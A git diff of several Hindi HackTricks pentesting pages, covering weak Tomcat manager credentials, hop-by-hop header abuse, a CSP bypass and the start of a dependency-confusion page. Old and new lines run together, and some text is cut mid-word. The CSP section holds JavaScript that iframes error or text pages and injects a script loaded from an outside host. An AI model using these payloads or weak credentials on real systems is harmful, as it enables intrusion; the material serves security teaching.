**`tomcat-users.xml`** फ़ाइल का उपयोग **`/manager` और `host-manager` व्यवस्थापक पृष्ठों** के लिए पहुंच को **अनुमति देने** या न देने के लिए किया जाता है। **`tomcat-users.xml`** फ़ाइल का उपयोग **`/manager` और `host-manager` व्यवस्थापक पृष्ठों** तक पहुंच की अनुमति देने या न देने के लिए किया जाता है।
```xml ```xml
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
@ -144,7 +143,7 @@ will also need to set the passwords to something appropriate.
</tomcat-users> </tomcat-users>
``` ```
यह फ़ाइल हमें दिखाती है कि प्रत्येक भूमिका `manager-gui`, `manager-script`, `manager-jmx` और `manager-status` किसक पहुंच प्रदान करती है। इस उदाहरण में, हम देख सकते हैं कि एक उपयोगकर्ता `tomcat` जिसका पासवर्ड `tomcat` है, के पास `manager-gui` भूमिका है, और एक दूसरा कमजोर पासवर्ड `admin` उपयोगकर्ता खाते `admin` के लिए सेट किया गया है। यह फ़ाइल हमें दिखाती है कि प्रत्येक भूमिका `manager-gui`, `manager-script`, `manager-jmx`, और `manager-status` किसक पहुंच प्रदान करती है। इस उदाहरण में, हम देख सकते हैं कि एक उपयोगकर्ता `tomcat` जिसका पासवर्ड `tomcat` है, के पास `manager-gui` भूमिका है, और एक दूसरा कमजोर पासवर्ड `admin` उपयोगकर्ता खाते `admin` के लिए सेट किया गया है।
## संदर्भ ## संदर्भ
@ -152,7 +151,7 @@ will also need to set the passwords to something appropriate.
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषता को ढूंढें जो सबसे अधिक मायने रखती है ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपके पूरे टेक स्टैक में मुद्दों को खोजता है। [**इसे आजमाएं मुफ्त में**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)। ो विकल्प खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसका प्रयास करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -161,10 +160,10 @@ will also need to set the passwords to something appropriate.
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की सुविधा** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को HackTricks में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * प्राप्त करें [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।** * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -7,43 +7,11 @@
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण देखना है या HackTricks को PDF में डाउनलोड करना है**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण देखना है या HackTricks को PDF में डाउनलोड करना है**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
**यह पोस्ट [https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers) का सारांश है** **यह पोस्ट [https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers) का सारांश है**
हॉप-बाय-हॉप हेडर्स एकल परिवहन स्तर कनेक्शन के लिए विशेष होते हैं, मुख्य रूप से HTTP/1.1 में डेटा प्रबंधन के लिए उपयोग किए जाते हैं (जैसे क्लाइंट-प्रॉक्सी या प्रॉक्सी-प्रॉक्सी के बीच), और आगे नहीं भेजे जाने के लिए होते हैं। मानक हॉप-बाय-हॉप हेडर्स में `Keep-Alive`, `Transfer-Encoding`, `TE`, `Connection`, `Trailer`, `Upgrade`, `Proxy-Authorization`, और `Proxy-Authenticate` शामिल हैं, जैसा कि [RFC 2616](https://tools.ietf.org/html/rfc2616#section-13.5.1) में परिभाषित है। अतिरिक्त हेडर्स को `Connection` हेडर के माध्यम से हॉप-बाय-हॉप नामित किया जा सकता है। हॉप-ब
### हॉप-बाय-हॉप हेडर्स का दुरुपयोग
प्रॉक्सी द्वारा हॉप-बाय-हॉप हेडर्स का अनुचित प्रबंधन सुरक्षा समस्याओं में ले जा सकता है। जबकि प्रॉक्सी से इन हेडर्स को हटाने की उम्मीद होती है, सभी ऐसा नहीं करते, जिससे संभावित भेदभाव हो सकता है।
### हॉप-बाय-हॉप हेडर्स हैंडलिंग के लिए टेस्टिंग
हॉप-बाय-हॉप हेडर्स के हैंडलिंग को टेस्ट किया जा सकता है जब विशेष हेडर्स को हॉप-बाय-हॉप बताया जाता है, सर्वर प्रतिक्रियाओं में परिवर्तनों को देखकर। उपकरण और स्क्रिप्ट इस प्रक्रिया को स्वचालित कर सकते हैं, प्रॉक्सी इन हेडर्स का प्रबंधन कैसे करते हैं और गलत कॉन्फ़िगरेशन या प्रॉक्सी व्यवहार का पता लगा सकते हैं।
हॉप-बाय-हॉप हेडर्स का दुरुपयोग विभिन्न सुरक्षा प्रभावों में ले जा सकता है। नीचे कुछ उदाहरण हैं जो दिखाते हैं कि इन हेडर्स को कैसे दुरुपयोग किया जा सकता है:
### `X-Forwarded-For` का उपयोग करके सुरक्षा नियंत्रण को छलना
एक हमलावर `X-Forwarded-For` हेडर को छलकर आईपी-आधारित पहुंच नियंत्रण को छल सकता है। यह हेडर अक्सर प्रॉक्सी द्वारा उपयोग किया जाता है ताकि प्रॉक्सी उपयोक्ता के मूल आईपी पते का पता लगा सके। हालांकि, यदि कोई प्रॉक्सी इस हेडर को हॉप-बाय-हॉप मानता है और उसे सही सत्यापन के बिना आगे भेजता है, तो हमलावर अपना आईपी पता छल सकता है।
**हमला स्थिति:**
1. हमलावर एक वेब एप्लिकेशन को प्रॉक्सी के पीछे एक HTTP अनुरोध भेजता है, `X-Forwarded-For` हेडर में एक नकली आईपी पता शामिल करता है।
2. हमलावर `Connection: close, X-Forwarded-For` हेडर भी शामिल करता है, जिससे प्रॉक्सी `X-Forwarded-For` को हॉप-बाय-हॉप मानता है।
3. गलत कॉन्फ़िगर किया गया प्रॉक्सी वेब एप्लिकेशन को छले बिना उस `X-Forwarded-For` हेडर के साथ आगे भेजता है।
4. वेब एप्लिकेशन, मूल `X-Forwarded-For` हेडर नहीं देखता, शायद अनधिकृत पहुंच के रूप में अनुमानित पहुंच के रूप में विचार कर सकता है, जिससे अनधिकृत पहुंच संभावित अनुमति दे सकती है।
### हॉप-बाय-हॉप हेडर इंजेक्शन के माध्यम से कैश पॉइजनिंग
यदि कैश सर्वर हॉप-बाय-हॉप हेडर्स पर आधारित सामग्री कैश करता है, तो हमलावर दुर्भाग्यपूर्ण हेडर्स डालकर कैश को पॉइजन कर सकता है। इससे उपयोगकर्ताओं को गलत या दुर्भाग्यपूर्ण सामग्री सेवित की जा सकती है।
**हमला स्थिति:**
1. एक हमलावर एक वेब एप्लिकेशन को एक हॉप-बाय-हॉप हेडर के साथ अनुरोध भेजता है जो कैश नहीं होना चाहिए (जैसे `Connection: close, Cookie`।)
2. खराब रूप से कॉन्फ़िगर किया गया कैश सर्वर हॉप-बाय-हॉप हेडर को हटाने में असफल रहता है और हमलावर के सत्र के लिए विशेष उत्तर प्रदान करता है।
3. भविष्य के उपयोगकर्ताओं को एक ही संसाधन का अनुरोध करने पर उन्हें हमलावर के लिए अनुकूलित उत्तर मिलता है, जो हमलावर के लिए विशेष था, जिससे सत्र हाइजैकिंग या संवेदनशील जानकारी का प्रकट हो सकता है।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण देखना है या HackTricks को PDF में डाउनलोड करना है**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा

View file

@ -1,70 +1,59 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! दूसरे तरीके HackTricks का समर्थन करने के लिए:
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
</details> </details>
ऐसा एक विन्यास: A configuration such as:
``` ```
Content-Security-Policy: default-src self unsafe-inline; Content-Security-Policy: default-src 'self' 'unsafe-inline';
``` ```
नामित तरीके से कोई भी फंक्शन का उपयोग रोकता है जो स्ट्रिंग के रूप में भेजे गए कोड को निष्पादित करते हैं। उदाहरण के लिए: `eval, setTimeout, setInterval` सभी ब्लॉक हो जाएंगे क्योंकि इसमें `unsafe-eval` सेटिंग होती है। ### माध्यम से पाठ और छवियाँ
बाहरी स्रोतों से किसी भी सामग्री को भी ब्लॉक किया जाता है, जिसमें छवियाँ, CSS, वेबसॉकेट्स, और विशेष रूप से JS शामिल हैं। यह देखा गया है कि आधुनिक ब्राउज़र छवियों और पाठ को HTML में रूपांतरित करते हैं ताकि उनकी प्रदर्शन क्षमता बढ़ जाए (जैसे, पृष्ठभूमि सेट करना, केंद्रीकरण, आदि)। इस परिणामस्वरूप, यदि कोई छवि या पाठ फ़ाइल, जैसे `favicon.ico` या `robots.txt`, एक `iframe` के माध्यम से खोला जाता है, तो यह HTML के रूप में प्रदर्शित होता है। विशेष रूप से, इन पृष्ठों में अक्षमता सुरक्षा नीति (CSP) हेडर अक्षम होता है और X-Frame-Options शामिल नहीं होता है, जिससे उनसे विचारहीन जावास्क्रिप्ट का कार्यान्वयन किया जा सकता है:
## पाठ और छवियों के माध्यम से
आधुनिक ब्राउज़र छवियों और पाठ को HTML फ़ाइलों में रूपांतरित करते हैं ताकि उन्हें बेहतर दिखाया जा सके (पृष्ठभूमि सेट करें, केंद्रित करें, आदि)।
इसलिए, यदि आप **एक छवि या txt फ़ाइल** जैसे **favicon.ico** या **robots.txt** को **`iframe`** के साथ **खोलते हैं**, तो आप इसे HTML के रूप में खोलेंगे।
**इस तरह के पृष्ठों में आमतौर पर CSP हैडर नहीं होता है और X-Frame-Options नहीं हो सकता है**, इसलिए आप उनसे विचारशील JS को निष्पादित कर सकते हैं:
```javascript ```javascript
frame=document.createElement("iframe"); frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css"; frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame); document.body.appendChild(frame);
script=document.createElement('script'); script=document.createElement('script');
script.src='//bo0om.ru/csp.js'; script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script); window.frames[0].document.head.appendChild(script);
``` ```
## त्रुटियों के माध्यम से ### त्रुटियों के माध्यम से
टेक्स्ट फ़ाइल्स या छवियों की तरह, **त्रुटि प्रतिक्रियाएँ आमतौर पर CSP हैडर नहीं रखती हैं और X-Frame-Options भी नहीं हो सकती हैं**। इसलिए, आप त्रुटियों को बलपूर्वक उत्पन्न कर सकते हैं और उन्हें एक iframe में लोड कर सकते हैं: उसी तरह, त्रुटि प्रतिक्रियाएँ, जैसे पाठ फ़ाइलें या छवियाँ, आम तौर पर सीएसपी हेडर के बिना आती हैं और एक्स-फ्रेम-विकल्प को छोड़ सकती हैं। त्रुटियों को आईफ्रेम के भीतर लोड करने के लिए प्रेरित किया जा सकता है, जिससे निम्नलिखित क्रियाएँ की जा सकती हैं:
```javascript ```javascript
// Force nginx error // Inducing an nginx error
frame=document.createElement("iframe"); frame=document.createElement("iframe");
frame.src="/%2e%2e%2f"; frame.src="/%2e%2e%2f";
document.body.appendChild(frame); document.body.appendChild(frame);
// Force error via long URL // Triggering an error with a long URL
frame=document.createElement("iframe"); frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000); frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame); document.body.appendChild(frame);
// Force error via long cookies // Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)}; for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe"); frame=document.createElement("iframe");
frame.src="/"; frame.src="/";
document.body.appendChild(frame); document.body.appendChild(frame);
// Don't forget to remove them // Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="} for(var i=0;i<5;i++){document.cookie=i+"="}
``` ```
उल्लिखित किसी भी स्थिति को ट्रिगर करने के बाद, आईफ्रेम के भीतर जावास्क्रिप्ट निष्पादन संभव है जैसे:
```javascript ```javascript
// After any of the previous examples, you can execute JS in the iframe with something like:
script=document.createElement('script'); script=document.createElement('script');
script.src='//bo0om.ru/csp.js'; script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script); window.frames[0].document.head.appendChild(script);
``` ```
## संदर्भ ## संदर्भ
@ -74,16 +63,14 @@ window.frames[0].document.head.appendChild(script);
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! HackTricks का समर्थन करने के अन्य तरीके:
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह! * यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का पता लगाएं, हमारा संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।** * **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
</details> </details>

View file

@ -1,35 +1,38 @@
# डिपेंडेंसी कन्फ्यूजन # Dependency Confusion
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को डाउनलोड करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स रेपो (https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके। * **हैकिंग ट्रिक्स साझा करें** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।
</details> </details>
## मूलभूत जानकारी ## मौलिक जानकारी
ंक्षेप में, डिपेंडेंसी कन्फ्यूजन संकट उत्पन्न होता है जब एक परियोजना एक पुस्तकालय का उपयोग कर रही होती है जिसका **गलत वर्तनी वाला नाम**, **अस्तित्व नहीं**ोता है या एक **निर्दिष्ट संस्करण** के साथ और उपयोग की जाने वाली डिपेंडेंसी रिपॉजिटरी **सार्वजनिक** रिपॉजिटरी से **नवीनतम संस्करणों को इकट्ठा करने** की अनुमति देती है। ारांश में, एक डिपेंडेंसी कन्फ्यूजन सुरक्षा वंश्यता उत्पन्न होती है जब एक परियोजना एक पुस्तकालय का उपयोग कर रही है जिसका **गलत वर्णन** है, **अस्तित्व नहीं** है या **निर्दिष्ट संस्करण** है और उपयोग की गई डिपेंडेंसी रिपॉजिटरी को **सार्वजनिक** रिपॉजिटरियों से **नवीन संस्करण इकट्ठा करने की अनुमति** देता है।
* **गलत वर्तनी वाला**: `requests` की जगह पर **`reqests`** को आयात करें * **गलत वर्णन**: `requests` की जगह **`reqests`** आयात करें
* **अस्तित्व नहीं**: `कंपनी-लॉगिंग` को आयात करें, एक आंतरिक पुस्तकालय जो **अब मौजूद नहीं है** * **अस्तित्व नहीं**: `कंपनी-लॉगिंग` को आयात करें, एक आंतरिक पुस्तकालय जो **अब मौजूद नहीं है**
* **निर्दिष्ट संस्करण**: इस उदाहरण में `requests-company` जैसी **आंतरिक** **मौजूद** पुस्तकालय को आयात करें, लेकिन रिपॉजिटरी **सार्वजनिक रिपॉजिटरियों** की जांच करती है कि क्या **बड़े संस्करण** हैं। * **निर्दिष्ट संस्करण**: एक **आंतरिक** **मौजूद** `कंपनी-रिक्वेस्ट्स` पुस्तकालय को आयात करें, लेकिन रिपॉ ने **सार्वजनिक रिपॉ** की जांच करने की अनुमति दी है कि क्या **अधिक संस्करण** हैं।
## शोषण ## शोषण
{% hint style="warning" %} {% hint style="warning" %}
